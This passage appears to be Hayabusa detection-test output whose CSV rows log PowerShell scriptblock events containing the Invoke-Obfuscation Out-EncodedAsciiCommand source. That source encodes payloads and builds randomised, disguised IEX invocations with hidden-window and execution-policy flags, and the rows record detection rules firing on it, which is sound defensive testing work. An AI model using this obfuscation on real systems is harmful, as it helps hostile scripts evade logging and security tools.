$RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. 